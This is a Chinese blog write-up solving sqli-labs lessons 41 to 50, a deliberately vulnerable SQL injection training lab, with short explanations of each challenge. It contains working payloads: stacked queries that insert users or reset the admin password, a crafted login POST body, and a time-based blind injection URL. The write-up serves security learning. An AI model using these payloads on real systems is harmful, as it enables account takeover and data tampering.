sqli-labs 41到50

合集 - sqli-lab(10)
1.sqli-labs-1到42.sqli-labs5到103.sqli-lab 15到194.sqli-labs 11到14题5.sqli-labs 20到236.sqli-labs 24到267.sqli-labs 27到308.sqli-labs 32到40
9.sqli-labs 41到50
10.upload-labs 1到21题通关详解
收起

第四十一题

 判断为数字型注入,如果使用union注入很快可以,但这里可以使用堆叠查询注入

 也是跟上一题一样的。

?
1
id=1;insert into users(id,username,password) value (21,'sd','bd')--+d

第四十二题

是一个post型传参

再password处存在闭合方式为‘的注入

 如果使用报错注入会很简单

 如果点击新建用户,会看到:

 因此用注入的方式创建一个用户

 

修改admin密码

?
1
1';update users set password=12344 where username='admin';

 第四十三题

 存在')闭合注入,报错注入

 或者堆叠查询注入

?
1
login_user=1&login_password=1');update users set password='sdsdsd' where username='admin';-- -&mysubmit=Login

 第四十四题

测试'  、"等都没有反应

使用以下语句,用户名正确,密码用万能密码

发现'时页面不一样

 如果不用抓包的话其实已经登录成功了

 因此是’闭合。

还是堆叠查询注入

?
1
login_user=admin&login_password=1';insert into users(id,username,password) value (21,'sd','bd')--+&mysubmit=Login

 第四十五题

没有任何回显,使用语句admin')#登录成功,闭合方式为‘)

 依然是堆叠查询注入。与之前一样

第四十六题

 为数字型注入

 第四十七题

上一题中sort只能填1到3,这里无论填了几都是一样的输出

判断闭合方式为’的字符型注入 

 继续用报错注入

 第四十八题

数字型注入,没有错误回显,使用时间盲注

?
1
http://localhost/sqli-labs-php7-master/Less-48?sort=1 and (if (ascii(substr(database(),1,1))=163,0,sleep(5)))--+

 第四十九题

闭合方式为'的时间盲注,与上一题一样。

 第五十题

 数字型注入,有报错回显

可以报错注入也可以堆叠查询注入。

 

posted @   米斯特李  阅读(75)  评论(0编辑  收藏  举报
相关博文:
·  sqli-labs 32到40
·  sqli-labs 11到14题
·  【sqli-labs】学习--待续
·  sqli-labs刷题(38-53)
·  sqli-labs通关lesson36-40
阅读排行:
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· ollama系列01:轻松3步本地部署deepseek,普通电脑可用
· 25岁的心里话
· 按钮权限的设计及实现
点击右上角即可分享
微信分享提示
SQL AI 助手